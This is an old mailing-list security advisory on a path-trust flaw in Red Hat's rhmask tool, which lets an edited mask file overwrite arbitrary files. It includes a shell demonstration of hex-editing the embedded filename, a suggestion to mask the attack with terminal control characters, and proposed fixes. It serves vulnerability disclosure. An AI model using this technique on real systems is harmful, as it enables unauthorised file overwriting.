Program: rhmask
Version: 1.0-9
Distro: Redhat 7.1 (didn't come pre-installed on my installation.)

DESCRIPTION
-----------

       rhmask is intended to allow the distribution of files as
       masks against other files. This lets new versions of soft-
       ware be freely distributed on public internet servers but
       limits their usefulness to those who already have a copy
       of the package. It uses a simple XOR scheme for creating
       the file mask and uses file size and md5 sums to ensure
       the integrity of the result.

SYNOPSIS
--------

       rhmask <infile> <maskfile>
       rhmask -d <infile> <outfile> <maskfile>

Problem:
--------

rhmask will blindly trust the output filename in the mask given
to it. This
allows, for example, overwriting of /etc/passwd (or creatation).
(Subject to the priviledges that ran rhmask , of course).

Vendor Status
-------------

The author (Erik Troan, ewtredhat.com) was informed about this a
couple of months ago, and he told me this was a non-issue as
RedHat where moving to a different system.

Notes:
------

Files created will be created with 0666 (subject to your umask).
If a person
has a umask of 0, files will be readable + writable by all. (duh)

rhmask takes different filesizes.

Demonstration:
--------------

[andrewgblackhole rhmask_test]$ cat <<_EOF_ >old_file
> this is the old version
> _EOF_
[andrewgblackhole rhmask_test]$ cat <<_EOF_ >new_file
> this is the new version
> _EOF_
[andrewgblackhole rhmask_test]$ cat <<_EOF_ >victim
> I'm a helpless victim file
> _EOF_
[andrewgblackhole rhmask_test]$ rhmask -d old_file new_file
replace_old_file.mask
[andrewgblackhole rhmask_test]$ rm -f new_file
[andrewgblackhole rhmask_test]$ rhmask old_file
replace_old_file.mask
generating new_file
[andrewgblackhole rhmask_test]$ cat new_file
this is the new version
[andrewgblackhole rhmask_test]$ strings replace_old_file.mask
7728359c40db617325aa6fc217714c7a6268f6888f1834f2d36ebc661fbbbea2new_file
[andrewgblackhole rhmask_test]$ ht replace_old_file.mask

[ ht is a binary editor for linux ]

[andrewgblackhole rhmask_test]$ strings replace_old_file.mask
7728359c40db617325aa6fc217714c7a6268f6888f1834f2d36ebc661fbbbea2victim
[andrewgblackhole rhmask_test]$ rhmask old_file
replace_old_file.mask
generating victim
[andrewgblackhole rhmask_test]$ cat victim
this is the new version

[ you killed kenny! ]

[andrewgblackhole rhmask_test]$ rhmask -d old_file new_file
replace_old_file.mask
[andrewgblackhole rhmask_test]$ ht replace_old_file.mask
[andrewgblackhole rhmask_test]$ strings replace_old_file.mask
7728359c40db617325aa6fc217714c7a6268f6888f1834f2d36ebc661fbbbea2/tmp/ile
[andrewgblackhole rhmask_test]$ rm -f /tmp/ile
[andrewgblackhole rhmask_test]$ rhmask old_file
replace_old_file.mask
generating /tmp/ile
[andrewgblackhole rhmask_test]$ cat /tmp/ile
this is the new version

Fix:

----
Firstly, have it ignore or complain about slashes in the
filename. Have it
prompt you if the target filename is a symbolic link.
[ In my oponion, sign the maskfile & make sure you check the
signature before
  using it. Oh, and don't obtain the maskfile + signature +
public key of the person from
  the same place. ]
Severity:
---------
Well, this part being the most subjective, I would say its rather
low, as it
tells you the file name as it does it. However, since it also
follows symlinks,
you could probably make a /tmp symlink with terminal characaters
in to
overwrite the filename. Possibly along the lines of a file of
'/tmp/symlink^Mgenerating harmless' which should output
"generating harmless"
to appear... however, when harmless doesn't appear or hasn't
changed their
will be most likely suspicion. file also has the same problem
with terminal
charaters in the data it reads and outputs.
Greets:
-------
zen-parse, jaguar
--
www.tasmail.com

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]